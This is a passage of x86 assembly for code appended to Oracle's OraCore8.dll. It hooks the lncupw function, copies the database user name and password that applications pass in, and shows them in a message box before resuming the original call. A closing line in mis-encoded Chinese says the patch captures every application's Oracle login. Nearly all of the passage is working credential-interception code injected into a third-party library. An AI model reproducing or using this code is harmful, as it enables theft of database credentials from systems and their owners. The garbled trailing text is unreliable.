;********************************************************************
pushad
call @F
@@:
pop ebx
sub ebx,offset @B
;********************************************************************
.if dword ptr [ebx+_MessageBox]         ; non-zero once the pointers have been resolved
jmp @F
.endif
;********************************************************************
invoke _GetKernelBase,7b000000h ;kernel32 base (scan starts at this fixed address)
or eax,eax
jz _ToOldEntry                          ; any failure: run the original code untouched
mov [ebx+hDllKernel32],eax ;GetProcAddress entry
lea eax,[ebx+szGetProcAddress]
invoke _GetApi,[ebx+hDllKernel32],eax
or eax,eax
jz _ToOldEntry
mov [ebx+_GetProcAddress],eax
lea eax,[ebx+szLoadLibrary] ;LoadLibraryA entry
invoke [ebx+_GetProcAddress],[ebx+hDllKernel32],eax
or eax,eax
jz _ToOldEntry
mov [ebx+_LoadLibrary],eax
lea eax,[ebx+szUser32] ;user32 module handle
invoke [ebx+_LoadLibrary],eax
or eax,eax
jz _ToOldEntry
mov [ebx+hDllUser32],eax
lea eax,[ebx+szMessageBox] ;MessageBoxA entry
invoke [ebx+_GetProcAddress],[ebx+hDllUser32],eax
mov [ebx+_MessageBox],eax               ; stored before the zero test (see review note above)
or eax,eax
jz _ToOldEntry
lea eax,[ebx+szwsprintf] ;wsprintfA entry
invoke [ebx+_GetProcAddress],[ebx+hDllUser32],eax
mov [ebx+_wsprintf],eax
or eax,eax
jz _ToOldEntry
;********************************************************************
; Main part
;********************************************************************
; lncupw is called as:
; invoke lncupw,addr Output,1eh,addr szPassword,dwLenPass,addr szUserName,dwLenName,NULL,1
; Stack at this point (after pushad):
; ...
; esp+14*4 dwLenUserName
; esp+13*4 addr szUserName
; esp+12*4 dwLenPass
; esp+11*4 addr szPassword
; esp+10*4 1eh
; esp+9*4 addr Output
; esp+8*4 caller's return address
; esp .. esp+8*4 the 8 register values pushed by pushad
;
; So esp+13*4 and esp+11*4 hold the addresses of the user name and
; password the application passed in for the database connection.
;********************************************************************
@@:
mov esi,[esp+13*4] ;username
lea edi,[ebx+szUserName]
mov ecx,[esp+14*4]
cmp ecx,60                              ; cap at 60 bytes so the NUL fits in 64 (signed compare, see note)
jle @F
mov ecx,60
@@:
cld
rep movsb
xor eax,eax
stosb                                   ; NUL-terminate
mov esi,[esp+11*4] ;password
lea edi,[ebx+szPassWord]
mov ecx,[esp+12*4]
cmp ecx,60
jle @F
mov ecx,60
@@:
rep movsb
xor eax,eax
stosb
lea eax,[ebx+szUserName]
lea ecx,[ebx+szPassWord]
lea edx,[ebx+szFormatPwd]
lea esi,[ebx+szTmpBuffer]
invoke [ebx+_wsprintf],esi,edx,eax,ecx  ; wsprintfA(szTmpBuffer, szFormatPwd, user, pass)
lea ecx,[ebx+szTmpBuffer]
lea eax,[ebx+szCaption]
invoke [ebx+_MessageBox],NULL,ecx,eax,MB_OK or MB_ICONINFORMATION or MB_SERVICE_NOTIFICATION
;********************************************************************
; Continue with the original function
;********************************************************************
_ToOldEntry:
popad
db 0e9h ;0e9h is the opcode of jmp rel32
_dwOldEntry:
dd ? ;rel32 to the original lncupw entry, filled in by the patcher
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
APPEND_CODE_END equ this byte
¶Ô OraCore8.dll ½øÐÐÁËÕâÑùµÄ²¹¶¡ÒԺ󣬷²ÊÇÓÐÓ¦ÓóÌÐòÁ¬½Ó Oracle Êý¾Ý¿â£¬¸½¼Ó´úÂë¾Í¿ÉÒԽػñµ½Á¬½ÓËùÓõÄÓû§ÃûºÍÃÜÂ벢ͨ¹ýÒ»¸ö MessageBox ÏÔʾ³öÀ´ÁË£¡